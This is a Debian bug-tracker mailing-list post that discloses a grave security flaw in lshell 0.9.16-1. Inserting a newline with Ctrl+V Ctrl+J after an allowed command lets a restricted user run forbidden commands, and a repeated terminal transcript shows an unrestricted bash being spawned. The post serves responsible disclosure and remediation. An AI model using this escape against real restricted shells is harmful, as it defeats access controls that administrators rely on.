[Secure-testing-team] Bug#834946: lshell: Shell outbreak with multiline commands
Vladislav Yarmak
yarmak.vladislav at gmail.com
Sat Aug 20 20:07:13 UTC 2016
Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Vladislav Yarmak <yarmak.vladislav at gmail.com>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: lshell: Shell outbreak with multiline commands
Message-ID: <20160820194404.1737.15528.reportbug at debian>
X-Mailer: reportbug 6.6.3
Date: Sat, 20 Aug 2016 22:44:04 +0300
X-Debbugs-Cc: Debian Security Team <team at security.debian.org>,
Debian Testing Security Team
<secure-testing-team at lists.alioth.debian.org>
Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole
Just type <CTRL+V><CTRL+J> after any allowed command and then type desired restricted command:
root at debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root at debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo
bash
testuser at debian:~$ ps -f
UID PID PPID C STIME TTY TIME CMD
testuser 1641 1640 0 22:27 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell
testuser 1642 1641 0 22:27 pts/1 00:00:00 sh -c set -m; echo bash
testuser 1643 1642 0 22:27 pts/1 00:00:00 bash
testuser 1648 1643 0 22:27 pts/1 00:00:00 ps -f
Problem exists in current upstream code. There are opened issue on Github but no reaction yet: https://github.com/ghantoos/lshell/issues/149.
Command parser in this shell is beyound of recovery. I recommend to replace this shell with symlink to /usr/sbin/nologin.
-- System Information:
Debian Release: 8.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages lshell depends on:
ii adduser 3.113+nmu3
ii python 2.7.9-1
lshell recommends no packages.
lshell suggests no packages.
-- no debconf information
*** outbreak.txt
root at debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root at debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo
bash
testuser at debian:~$ ps -f
UID PID PPID C STIME TTY TIME CMD
testuser 1641 1640 0 22:27 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell
testuser 1642 1641 0 22:27 pts/1 00:00:00 sh -c set -m; echo bash
testuser 1643 1642 0 22:27 pts/1 00:00:00 bash
testuser 1648 1643 0 22:27 pts/1 00:00:00 ps -f
-- System Information:
Debian Release: 8.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages lshell depends on:
ii adduser 3.113+nmu3
ii python 2.7.9-1
lshell recommends no packages.
lshell suggests no packages.
-- no debconf information
More information about the Secure-testing-team
mailing list